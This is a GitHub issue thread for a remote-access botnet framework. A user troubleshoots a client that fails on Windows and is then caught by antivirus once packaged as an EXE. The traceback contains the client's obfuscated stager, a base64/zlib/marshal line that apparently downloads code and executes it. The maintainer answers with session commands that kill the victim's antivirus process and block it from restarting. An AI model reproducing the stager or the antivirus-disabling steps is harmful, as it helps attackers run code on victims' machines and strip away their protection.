### ISSUE TITLE
invalid syntax

### ISSUE THREAD

**Issue by AlexHsu1987** [malwaredllc/byob#80]
Hi,
I run server.py on my VPS, and client.py generate a client on VPS. It runs well and i get a session!
But while i generate a client on my windows system. I got bellow "invalid syntax" error! 
what's wrong with this. i'V no idea *_*
D:\myProgs\myPython\byob-master\byob>py -2 byob_lwc.py
Traceback (most recent call last):
  File "byob_lwc.py", line 1, in <module>
    import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('eJwrdmFgYCgtysnJTNIDUvkFqXka6hklJQVW+vqG5kZ6lsZ6JoZ6hkbmVkamRgaG+vr6xSWJ6alFxfo55cl6BZXqmnpFqYkpGpoAFwEVXA==')))))
  File "<string>", line 1
    <head>
    ^
SyntaxError: invalid syntax

**Comment by AlexHsu1987** [comment]
thanks for quick apply 
the version on windows is pyhton2.7.15, also i have version python 3.6 on windows too. on VPS also two version, I run server.py with version 2.7.15 on VPS

D:\myProgs\myPython\byob-master\byob>python
Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:22:17) [MSC v.1500 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>>

**Comment by AlexHsu1987** [comment]
I'v read your comments in other threads. The cause is that I should generate the client on the exact system the server.py runs! That's a shame mistake of mine. 
I generate the client as py file on my VPS, then I download and run the py file on my WINDOW 7, I can get a session on VPS. But when i package the py file into exe file with pyinstaller, the AV just kill my generated EXE! *_*

**Comment by malwaredllc** [comment]
When running the generated EXE on Windows, if you get a shell before the AV kills the process then you can kill the AV by using the command `process kill AV.exe` and then block the AV from re-launching by using the command `process block AV.exe` (with `AV.exe` being the name of the AV executable). 

Example (Norton Anti-Virus):

`process kill savscan.exe`
`process block savscan.exe`
